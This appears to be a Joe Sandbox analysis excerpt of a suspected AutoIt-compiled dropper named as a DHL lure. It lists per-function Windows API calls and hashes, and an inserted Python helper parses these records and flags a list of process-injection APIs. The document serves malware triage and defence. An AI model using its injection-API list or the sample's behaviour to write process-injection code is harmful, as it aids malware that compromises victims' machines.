• Opcode Fuzzy Hash: fffdb3a9c45c1b5a694e36e59a0766fbbf5858baa4db9bf3d1dfaa3cbd2dc872
• Instruction Fuzzy Hash: 13617A71900208AFDB11DFA4CC85FEE77B8EB09714F200159FA14EB2A1D771AE41DB94
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C56BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00C56C18
• VariantInit.OLEAUT32(?), ref: 00C56C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00C56C4A
• VariantCopy.OLEAUT32(?,?), ref: 00C56C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00C56CB1
• VariantClear.OLEAUT32(?), ref: 00C56CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00C56CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C56CDC
• VariantClear.OLEAUT32(?), ref: 00C56CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C56CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: da89e415a81a502bd746314d616025650117e81434d598d56c5c815f83fbe320
• Instruction ID: 013b27b891314e267588547d3f98c5976e2c7be0fbaba6290c468c386901ddf0
• Opcode Fuzzy Hash: da89e415a81a502bd746314d616025650117e81434d598d56c5c815f83fbe320
• Instruction Fuzzy Hash: 0E4154759001199FCF00DF64D844AAEBBB9EF48351F408069E955E7361CB30EA8ADF94
APIs
  • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
• GetSystemMetrics.USER32(0000000F), ref: 00C8D47C
• GetSystemMetrics.USER32(0000000F), ref: 00C8D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C8D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C8D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C8D716
• ShowWindow.USER32(00000003,00000000), ref: 00C8D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 00C8D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00C8D77D
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID: @U=u
• API String ID: 1211466189-2594219639
• Opcode ID: b3292736925c0a9d67ed7737480a4c508e1ee4bbdfcff666527e7e77b945482d
• Instruction ID: e9de60a007a0e60311b7ec70245161aae14c4a7a680efc4207735e4037446f80
• Opcode Fuzzy Hash: b3292736925c0a9d67ed7737480a4c508e1ee4bbdfcff666527e7e77b945482d
• Instruction Fuzzy Hash: 56B1AC71600229EFDF14DF68C9C5BAD7BB1BF04705F088069FC5A9B299E730AA90CB54
APIs
  • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
  • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
• CoInitialize.OLE32 ref: 00C78403
• CoUninitialize.OLE32 ref: 00C7840E
• CoCreateInstance.OLE32(?,00000000,00000017,00C92BEC,?), ref: 00C7846E
• IIDFromString.OLE32(?,?), ref: 00C784E1
• VariantInit.OLEAUT32(?), ref: 00C7857B
• VariantClear.OLEAUT32(?), ref: 00C785DC
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: dd25265b7bda5014ac565a5708be3e27d55c2cbe273c59869418ddc8788c2908
• Instruction ID: c4aa80639b773f4e1c671ae0fc1b34d46c1137cd3439b2694fd20e60fd873f3e
• Opcode Fuzzy Hash: dd25265b7bda5014ac565a5708be3e27d55c2cbe273c59869418ddc8788c2908
• Instruction Fuzzy Hash: 9961AE706483129FD710DF65C84CB6EB7E8AF49754F00851DFA9A9B291CB70EE48CB92
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00C02EAE
  • Part of subcall function 00C01DB3: GetClientRect.USER32(?,?), ref: 00C01DDC
  • Part of subcall function 00C01DB3: GetWindowRect.USER32(?,?), ref: 00C01E1D
  • Part of subcall function 00C01DB3: ScreenToClient.USER32(?,?), ref: 00C01E45
• GetDC.USER32 ref: 00C3CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C3CD45
• SelectObject.GDI32(00000000,00000000), ref: 00C3CD53
• SelectObject.GDI32(00000000,00000000), ref: 00C3CD68
• ReleaseDC.USER32(?,00000000), ref: 00C3CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C3CDFB
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: @U=u$U
• API String ID: 4009187628-4110099822
• Opcode ID: 4b9fa1ba40f0f65cd62496406eec2c5d7a975079cb3badfa39a77ee2a0aba040
• Instruction ID: e429f150055628e0367e483edbc6a22a225eae96a60df8f8ad7129ea9bb54f9b
• Opcode Fuzzy Hash: 4b9fa1ba40f0f65cd62496406eec2c5d7a975079cb3badfa39a77ee2a0aba040
• Instruction Fuzzy Hash: DF71DF31510209DFCF219F64C8C4AAE7BB5FF48321F14426AFD65AA2A6D7319A81DB60
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00C75793
• inet_addr.WSOCK32(?,?,?), ref: 00C757D8
• gethostbyname.WSOCK32(?), ref: 00C757E4
• IcmpCreateFile.IPHLPAPI ref: 00C757F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C75862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C75878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C758ED
• WSACleanup.WSOCK32 ref: 00C758F3
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 950056fd92e76722ae4b058b2882cd00cc710fdd8994f41d7518cf083fdb49d8
                                                                                        • Instruction ID: 81151d47126a1b7f9cb7f9de7e7ea1eef4713cbc4544012270a6e5c012428f5c
                                                                                        • Opcode Fuzzy Hash: 950056fd92e76722ae4b058b2882cd00cc710fdd8994f41d7518cf083fdb49d8
                                                                                        • Instruction Fuzzy Hash: A0518E316446009FDB109F25DC49B2A7BE4EF48720F148529F96ADB2E1DB70E905DB46
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C6B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C6B546
• GetLastError.KERNEL32 ref: 00C6B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 00C6B5BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 8ef348a16beb314e5a04c0fb5c8d5df4ce39c166eb57a738b7054780618dc6f7
• Instruction ID: 1477b54c86540d80fef70be94121e0411608db6d3b81946af0d482e24d24aec6
• Opcode Fuzzy Hash: 8ef348a16beb314e5a04c0fb5c8d5df4ce39c166eb57a738b7054780618dc6f7
• Instruction Fuzzy Hash: A0318135A002059FCB20EBA8CC85FEE77B4FF05310F104165E516D7291DB719E86DB51
APIs
• DeleteObject.GDI32(00000000), ref: 00C861EB
• GetDC.USER32(00000000), ref: 00C861F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C861FE
• ReleaseDC.USER32(00000000,00000000), ref: 00C8620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C86246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C86257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C86291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C862B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID: @U=u
• API String ID: 3864802216-2594219639
• Opcode ID: 9f190b0415552c97188ddbb4f17ff7057218f54ed4175717c32cc16cc64811af
• Instruction ID: d91d102301bd627638a1e907bd136077146b747f40365049aa8eec1d1c0b8860
• Opcode Fuzzy Hash: 9f190b0415552c97188ddbb4f17ff7057218f54ed4175717c32cc16cc64811af
• Instruction Fuzzy Hash: 42317F72101214BFEB119F50CC8AFEA3BA9EF49765F044069FE08DA191D7759C42CB78
APIs
• VariantInit.OLEAUT32(?), ref: 00C788D7
• CoInitialize.OLE32(00000000), ref: 00C78904
• CoUninitialize.OLE32 ref: 00C7890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00C78A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00C78B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C92C0C), ref: 00C78B6F
• CoGetObject.OLE32(?,00000000,00C92C0C,?), ref: 00C78B92
• SetErrorMode.KERNEL32(00000000), ref: 00C78BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C78C25
• VariantClear.OLEAUT32(?), ref: 00C78C35
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: d3c43612c56f66cdedb6b3cb58a0a05783a9b374a58523425a36f74496c34204
• Instruction ID: 8481ace4fd7aa5ba26167c528c403129bfd2db4ff2dc09dbe2185452246d9994
• Opcode Fuzzy Hash: d3c43612c56f66cdedb6b3cb58a0a05783a9b374a58523425a36f74496c34204
• Instruction Fuzzy Hash: 03C119B16043059FD700DF64C888A2BB7E9FF89348F00895DF6999B251DB71ED4ACB52
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C67A6C
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 9960f7974daac662b2c6a51a31cfbcbf6c2a60c735cf719618a4d8eb6299a13d
• Instruction ID: c7327999e68c8ca42f9fb696fdcf2c0b767486fc628ccc2ce441685343e3a60d
• Opcode Fuzzy Hash: 9960f7974daac662b2c6a51a31cfbcbf6c2a60c735cf719618a4d8eb6299a13d
• Instruction Fuzzy Hash: DBB18C7190421AAFDB20DFA4C8C4BBEB7F4EF49329F204A29E511A7291D734E941DB90
APIs
• GetCurrentThreadId.KERNEL32 ref: 00C611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C61204
• GetWindowThreadProcessId.USER32(00000000), ref: 00C6120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C6121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C61245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C61257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C6129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C612B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C612BC
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 3e3558de305b5aab2fc33678f7fbe3993c6382bb90dd9a63cf89520c200992e0
• Instruction ID: 8c869391d01ff2d1dbe1e6bff13dd96dfc14e1dba6e1982ddb788c58076e249f
• Opcode Fuzzy Hash: 3e3558de305b5aab2fc33678f7fbe3993c6382bb90dd9a63cf89520c200992e0
• Instruction Fuzzy Hash: F331CE75600208FBDB209F95ED98F6E37A9EF54316F18422DFD50C61A0D7B49E428B60
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C0FAA6
• OleUninitialize.OLE32(?,00000000), ref: 00C0FB45
• UnregisterHotKey.USER32(?), ref: 00C0FC9C
• DestroyWindow.USER32(?), ref: 00C445D6
• FreeLibrary.KERNEL32(?), ref: 00C4463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C44668
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 811f96c95e2a33481956e92e30aff485010e30d1a3cb3eb3d4e4ff33b18bd9f1
• Instruction ID: fbdeec74f15fede528965ae38d6594a4bc4e99c31b2ee80dbbc72a6ef59adcd3
• Opcode Fuzzy Hash: 811f96c95e2a33481956e92e30aff485010e30d1a3cb3eb3d4e4ff33b18bd9f1
• Instruction Fuzzy Hash: D2A17C30301212CFDB29EF14C595BA9F364BF05710F6542ADE80AAB6A2DB30AD57DF90
APIs
• EnumChildWindows.USER32(?,00C5A439), ref: 00C5A377
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 639d21ceebed89d88c63b950eca5a1df66822a80d526224391af2da7771a8049
• Instruction ID: bdfad236a6edf5f55903850e646f0577f3b64dfb013d3c19ead8313c10a3fa36
• Opcode Fuzzy Hash: 639d21ceebed89d88c63b950eca5a1df66822a80d526224391af2da7771a8049
• Instruction Fuzzy Hash: 2B91C634900605EACB08DFA1C892BEDFB74BF04305F508229EC5DA7191DB31AADDEB95
APIs
• IsWindow.USER32(013B77E0), ref: 00C8B3EB
• IsWindowEnabled.USER32(013B77E0), ref: 00C8B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C8B4DB
• SendMessageW.USER32(013B77E0,000000B0,?,?), ref: 00C8B512
• IsDlgButtonChecked.USER32(?,?), ref: 00C8B54F
• GetWindowLongW.USER32(013B77E0,000000EC), ref: 00C8B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C8B589
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID: @U=u
• API String ID: 4072528602-2594219639
• Opcode ID: ab80b824b42abb079127642d065e3008aff410d000b1be8c13fda9c59154da25
• Instruction ID: 978432f2e0a62d9a8c432a4828b585b7eaf00e7b73a4277b349b3cdfded9c8de
• Opcode Fuzzy Hash: ab80b824b42abb079127642d065e3008aff410d000b1be8c13fda9c59154da25
• Instruction Fuzzy Hash: 1471BF34600604EFDB20AF64C895FBA7BB9EF49304F14415DF966972A2C731AE81DB58
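The function records above are the raw per-function listings Joe Sandbox emits for the dropper's code section, and because the report classifies the binary as a compiled AutoIt script, most of them are AutoIt runtime helpers (the Ping record, the DriveStatus record with its INVALID/NOTREADY/READONLY/READY/UNKNOWN strings, the control lookup keyed on CLASS/CLASSNN/INSTANCE/NAME/REGEXPCLASS/TEXT) rather than behaviour of the script itself. When triaging a listing this long, an analyst wants to parse the records, strip the interpreter noise, and surface any function that touches the injection APIs the report's signatures imply (foreign memory writes, APC queueing, thread-context changes). The following Python is an added triage helper, not part of the report or of Joe Sandbox; the sample records are copied from this page, the fingerprint labels and the injection-API list are this example's own assumptions, and the one record used to exercise the injection branch is constructed, not taken from the sample.

```python
"""Parse Joe Sandbox per-function 'APIs' records and fingerprint AutoIt runtime idioms.

Added triage helper for reports like the one on this page; not Joe Sandbox code.
"""
import re
from dataclasses import dataclass, field

# One API call line in a record, e.g.
#   • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005), ref: 00C75878
#   • WSACleanup.WSOCK32 ref: 00C758F3            (no argument list)
API_RE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# Anchored so "API String ID:" (a different field) is not picked up.
STRING_ID_RE = re.compile(r"^\s*[•*-]?\s*String ID:\s*(?P<s>.*)$")
OPCODE_RE = re.compile(r"Opcode ID:\s*(?P<h>[0-9a-f]{64})")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (api, module, args, ref)
    strings: list = field(default_factory=list)
    opcode_id: str = ""

    def api_names(self):
        return {api for api, _, _, _ in self.apis}


def parse_records(text):
    """Split report text into records; each record starts at a bare 'APIs' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            cur.apis.append((m["api"], m["module"], args, m["ref"]))
            continue
        m = STRING_ID_RE.match(line)
        if m:
            cur.strings = [s for s in m["s"].split("$") if s]   # '$' separates strings
            continue
        m = OPCODE_RE.search(line)
        if m:
            cur.opcode_id = m["h"]
    return records


# Analyst-maintained fingerprints: (label, required APIs, required strings).
# The API/string sets come from the records on this page; the labels naming
# AutoIt functions are this example's assumptions.
AUTOIT_FINGERPRINTS = [
    ("AutoIt Ping()", {"IcmpSendEcho", "IcmpCloseHandle"}, {"Ping"}),
    ("AutoIt DriveStatus()", {"GetDiskFreeSpaceW", "SetErrorMode"},
     {"INVALID", "NOTREADY", "READONLY", "READY", "UNKNOWN"}),
    ("AutoIt control lookup", {"EnumChildWindows"},
     {"CLASS", "CLASSNN", "INSTANCE", "NAME", "REGEXPCLASS", "TEXT"}),
    ("AutoIt script shutdown", {"mciSendStringW", "UnregisterHotKey", "OleUninitialize"},
     {"close all"}),
    ("AutoIt ObjGet()", {"CoGetInstanceFromFile", "CoGetObject", "GetRunningObjectTable"}, set()),
    ("AutoIt window activation", {"AttachThreadInput", "GetForegroundWindow"}, set()),
]

# APIs worth pulling out of the noise first; list chosen for this example.
INJECTION_APIS = {
    "WriteProcessMemory", "NtWriteVirtualMemory", "QueueUserAPC", "NtQueueApcThread",
    "SetThreadContext", "NtSetContextThread", "NtMapViewOfSection",
    "CreateRemoteThread", "VirtualAllocEx",
}


def classify(rec):
    """Label a record as runtime noise, injection-relevant, or unclassified."""
    names, strs = rec.api_names(), set(rec.strings)
    for label, need_apis, need_strs in AUTOIT_FINGERPRINTS:
        if need_apis <= names and need_strs <= strs:
            return label
    hits = names & INJECTION_APIS
    if hits:
        return "injection-relevant: " + ", ".join(sorted(hits))
    return "unclassified"


def triage(text):
    """One (opcode-id prefix, sorted API names, label) tuple per record."""
    return [(r.opcode_id[:12], sorted(r.api_names()), classify(r)) for r in parse_records(text)]


# Sample input: three records copied from this report, trimmed to the fields used.
SAMPLE_REPORT = """\
APIs
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C75878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C758ED
• WSACleanup.WSOCK32 ref: 00C758F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 950056fd92e76722ae4b058b2882cd00cc710fdd8994f41d7518cf083fdb49d8
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C6B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C6B546
• GetLastError.KERNEL32 ref: 00C6B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 00C6B5BD
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• Opcode ID: 8ef348a16beb314e5a04c0fb5c8d5df4ce39c166eb57a738b7054780618dc6f7
APIs
• EnumChildWindows.USER32(?,00C5A439), ref: 00C5A377
Similarity
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• Opcode ID: 639d21ceebed89d88c63b950eca5a1df66822a80d526224391af2da7771a8049
"""

# Constructed record (NOT from the report) to exercise the injection branch.
SYNTHETIC_INJECTION_RECORD = """\
APIs
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00000000
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00000000
• String ID:
"""

if __name__ == "__main__":
    for opcode, names, label in triage(SAMPLE_REPORT + SYNTHETIC_INJECTION_RECORD):
        print(f"{opcode:<12} {label:<28} {', '.join(names)}")
```

Running the script against a full report dump lets the analyst skip every record that resolves to a runtime fingerprint and read only the unclassified and injection-relevant ones; the fingerprint table grows as new runtime idioms are confirmed in clean AutoIt binaries.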
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C86E24
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C86E38
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C86E52
                                                                                        • _wcscat.LIBCMT ref: 00C86EAD
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C86EC4
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C86EF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: @U=u$SysListView32
                                                                                        • API String ID: 307300125-1908207174
                                                                                        • Opcode ID: d5d0aef091b7358cd7e80d64826ef3bdc894051b2fca9c8312f9e7f883ddee09
                                                                                        • Instruction ID: 3e3f714c592fb2f4b602afd8eddefea743cef923088868b48d0ab34d8aff35df
                                                                                        • Opcode Fuzzy Hash: d5d0aef091b7358cd7e80d64826ef3bdc894051b2fca9c8312f9e7f883ddee09
                                                                                        • Instruction Fuzzy Hash: CD41A171A00358AFEB21EF64CC85BEEB7B8EF08354F10052AF594E7291D6719E85CB64
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C71A50
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C71A7C
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C71ABE
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C71AD3
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C71AE0
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C71B10
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00C71B57
                                                                                          • Part of subcall function 00C72483: GetLastError.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C72498
                                                                                          • Part of subcall function 00C72483: SetEvent.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C724AD
                                                                                        Strings
